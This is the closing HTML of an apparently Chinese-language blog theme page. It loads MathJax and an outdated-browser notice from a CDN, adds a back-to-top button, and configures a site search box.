<script src="https://cdn.jsdelivr.net/npm/outdatedbrowser@1.1.5/outdatedbrowser/outdatedbrowser.min.js" defer></script>
<script>
    document.addEventListener("DOMContentLoaded", function () {
        outdatedBrowser({
            bgColor: '#f25648',
            color: '#ffffff',
            lowerThan: 'flex'
        });
    });
</script>


    
    
<script src="https://cdn.jsdelivr.net/npm/mathjax@2.7.5/unpacked/MathJax.js?config=TeX-MML-AM_CHTML" defer></script>
<script>
document.addEventListener('DOMContentLoaded', function () {
    MathJax.Hub.Config({
        'HTML-CSS': {
            matchFontHeight: false
        },
        SVG: {
            matchFontHeight: false
        },
        CommonHTML: {
            matchFontHeight: false
        },
        tex2jax: {
            inlineMath: [
                ['$','$'],
                ['\\(','\\)']
            ]
        }
    });
});
</script>

    
    

<a id="back-to-top" title="回到顶端" href="javascript:;">
    <i class="fas fa-chevron-up"></i>
</a>
<script src="/js/back-to-top.js" defer></script>


    
    

    
    
    
    

    
    
    
    
    

    


<script src="/js/main.js" defer></script>

    
    <div class="searchbox ins-search">
    <div class="searchbox-container ins-search-container">
        <div class="searchbox-input-wrapper">
            <input type="text" class="searchbox-input ins-search-input" placeholder="想要查找什么..." />
            <span class="searchbox-close ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="searchbox-result-wrapper ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
    (function (window) {
        var INSIGHT_CONFIG = {
            TRANSLATION: {
                POSTS: '文章',
                PAGES: '页面',
                CATEGORIES: '分类',
                TAGS: '标签',
                UNTITLED: '(无标题)',
            },
            CONTENT_URL: '/content.json',
        };
        window.INSIGHT_CONFIG = INSIGHT_CONFIG;
    })(window);
</script>
<script src="/js/insight.js" defer></script>
<link rel="stylesheet" href="/css/search.css">
<link rel="stylesheet" href="/css/insight.css">
    
</body>
</html>